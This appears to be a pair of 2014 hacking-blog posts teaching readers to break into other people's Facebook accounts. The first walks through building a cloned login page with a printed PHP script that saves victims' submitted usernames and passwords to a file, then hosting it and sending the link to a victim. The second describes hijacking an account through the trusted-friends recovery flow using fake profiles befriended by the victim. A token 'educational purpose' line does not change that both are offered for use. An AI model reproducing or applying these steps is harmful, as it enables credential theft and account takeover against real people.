Tuesday 3 June 2014

                                                 hacking facebook account
As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....


                                 facebook hack 

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.
facebook phishing script
4.You will have to find a text which looks like ..


5.delete all the text written in red colour and instead of it write post.php.then it will look like...


6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .
                                                            hacking script 
8.Open a new notepad and save the given data with the name post.php.

header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
 9.You have two files now one is index.htm and another is post.php,remember file extension is important. 
10.Now u have to upload it in a web hosting site. 
11.Open this link  http://www.000webhost.com  and click on sign up.


12. You have to make a account in that ,after that it looks like a picture given below.

13.Now go CPannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.

15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .

16.Now the last step click on view of index.htm it will look same as facebook page.
                                            this is your Facebook phishing page

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.

19.Click on view now u will have your friend's password and email id.

20.This is a simple trick to hack any Facebook password account by phishing page.


phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....

Sunday 1 June 2014


I am going to teach you Hacking Facebook account passwords, i have already explained Hacking Facebook accounts or password using keyloggers and Phishing but this is absolutely manual method to hack Facebook password and its 500% working...Did you got  a shock if not, then you will get after reading this article. Facebook is adding more and more features to attract users but when you develop something that's for sure you will introduce new loopholes. Today i will explain you how to hack a Facebook account password just by utilizing recovery password loophole. These novice coders think that they have made secured features but they really doesn't their daddy is sitting outside. By today's hacking method i can give guarantee to you that you can hack anyone's Facebook account in less than 5 minutes and its 100% working hack and i have used it more than 100 times. I always tell things little bit late as i always love to enjoy the fancy of new loops..:P... This hack method is without using any tools...

Requirement to hack someone's Facebook account:
1. Victim (whose Facebook account password you wanna hack) should be on Facebook.
2. Create four to five fake Facebook accounts(three are sufficient but one more for bonus). I will advice you that create accounts with girl names and put an awesome girls photograph. Fill the basic profile.. Why i am saying create account with Girl names is just because Hungry boys accepts girls friend request without any delay. And if you know the person personally then create account with names of his near ones and say that you have created new profile so add you as a friend. Note all the three to four fake accounts should not be friends or any relationship with each other.
3. Most important requirement you need to add all above three account to the friends list of victim whose Facebook account you want to hack. Above method will be helpful for that :P.
3. At least two web browsers. So that one can be used as recovery purpose and one for viewing codes.

So guys i hope you all are clear with requirements to hack Facebook account password. Now lets hack someone's  Facebook account password practically to show that hacking Facebook accountreally works.

Steps to hack any Facebook account password in less than 10 minutes 100% working hack with practical example:  
In these steps i am hacking the Facebook account password of user whose email ID is ajay2008singh@gmail.com (its mine own account but fake one that i use for testing hacks).
1. Open the Facebook in your web browser. 
2. Now Click on Forgot your password? Now a new tab will open something like this. In the email box give the email ID 'ajay2008singh@gmail.com' and press enter or click on search button as shown in below snapshot..
Learn How to hack Facebook account password Snapshot 1

3. Now after Clicking on search you will get an Captcha verification. Type the words displayed and press enter.
4. Now You have reached to the screen Where Facebook gives the search results of the identity of previous step. There you will see button saying "This is my account" just click on that as shown below in snapshot:
Hacking Facebook account password snapshot 2
5. Now you have reached to the below Facebook password recovery screen as show below:
Hack Facebook Password recovery snapshot 3

Now Click on "No Longer have access to these?" hyperlink to go to next step.

6. Ahhah... It sounds great everything going smoothly... So friends after following step 5 you will reach below page that ask you Enter your new email ID for contact. Its most important as password reset request after submitting codes will be received on this.. Below is snapshot of screen 4:

How to hack facebook account or passwords snapshot 4

7. After submitting you will have either of two situations:
a. First One will be recover your account with friends.
b. Answer the security question if victim has set the security question.

Now what...

Oops.. he has set the security question and i dont know the answer... What should i do??.....Scared ... nopes...worried... nopes... Let's enter wrong answer to his security question three times... Omg... WTF has happened I am redirected to the First option " Recover your account with your friends" .. :P .. I love explain things in dramatic manner so that reader also get interest. :P

8. Now you are at screen saying " Recover your password using your friends" as shown below in snapshot.
100% working practical facebook account password hack snap 5
9. Just click on continue and select the three trusted friends :P The three fake accounts that we have created for him to hack his account....:P.. 
You can also perform this hack by making your friends participate to hack someones account...Now select three accounts one by one as one... Below is the screen shot showing that i have selected three friends whom i am sending codes.
Facebook account hacking final snapshot
 10. Foow....Oops.. I got all the three codes....Below is the screen where you will enter those three codes that you have received...
Filling confirmation codes for hacking facebook account

So guys we are done.... Fill the codes into boxes that you have received into you messages in Facebook and on email if feed is subscribed.

Click on submit now it will ask you to validate your email account that you have filled in Step number 6. That email should be genuine as you will receive recovery email on that email account only...

That finishes my Practical example with complete clear snapshots to hack Facebook account password..

As we know there are plenty of ways to Hack Facebook account and Tabnabbing is one of them, why don't read tabnabbing tutorial also:
Hack Facebook Account password using Tabnabbing

Try an advance tabnabbing tutorial to Hack Facebook account passwords:
Advanced Tabnabbing Tutorial HackingLoops

or for all good why don't see all possible methods that can be used to Hack Facebook accounts ( 4 most reliable ways to Hack Facebook accounts):
4 ways to Hack Facebook account password

How to Protect your own Facebook account from getting Hacked and tighten the security of your Facebook account read below:
How to Hack Protect Facebook Account

You guys might be interested in some other Cool Facebook tools for smart and colorful texts, try Hackingloops online smart text generator tools below:
Facebook Text Tools by HackingLoops